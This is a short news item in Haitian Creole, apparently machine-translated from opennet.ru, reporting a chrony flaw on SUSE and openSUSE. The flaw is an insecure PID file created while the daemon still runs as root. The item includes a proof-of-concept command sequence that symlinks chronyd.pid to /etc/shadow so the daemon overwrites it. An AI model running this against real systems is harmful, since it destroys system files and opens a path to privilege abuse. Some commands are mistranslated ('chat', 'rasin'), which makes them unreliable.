В
Se vilnerabilite a ki te koze pa kreyasyon an ensekirite nan yon dosye pid, ki te kreye nan yon etap lè chrony pa t 'ankò reset privilèj epi li te kouri kòm rasin. Nan ka sa a, anyè /run/chrony, kote yo ekri dosye pid la, te kreye ak dwa 0750 atravè systemd-tmpfiles oswa lè chronyd te lanse an asosyasyon ak itilizatè a ak gwoup "chrony". Kidonk, si ou gen aksè a chrony itilizatè a, li posib pou ranplase fichye pid /run/chrony/chronyd.pid la ak yon lyen senbolik. Yon lyen senbolik ka montre nenpòt dosye sistèm ki pral ranplase lè chronyd lanse.
rasin # systemctl sispann chronyd.service
rasin # sudo -u chrony /bin/bash
chrony$ cd /run/chrony
chrony$ ln -s /etc/shadow chronyd.pid
chrony$ sòti
rasin # /usr/sbin/chronyd -n
^C
# olye de sa ki nan /etc/shadow ID pwosesis chronyd la pral sove
rasin # chat /etc/shadow
15287
Vulnerabilite
Pwoblèm SUSE ak openSUSE
Sous: opennet.ru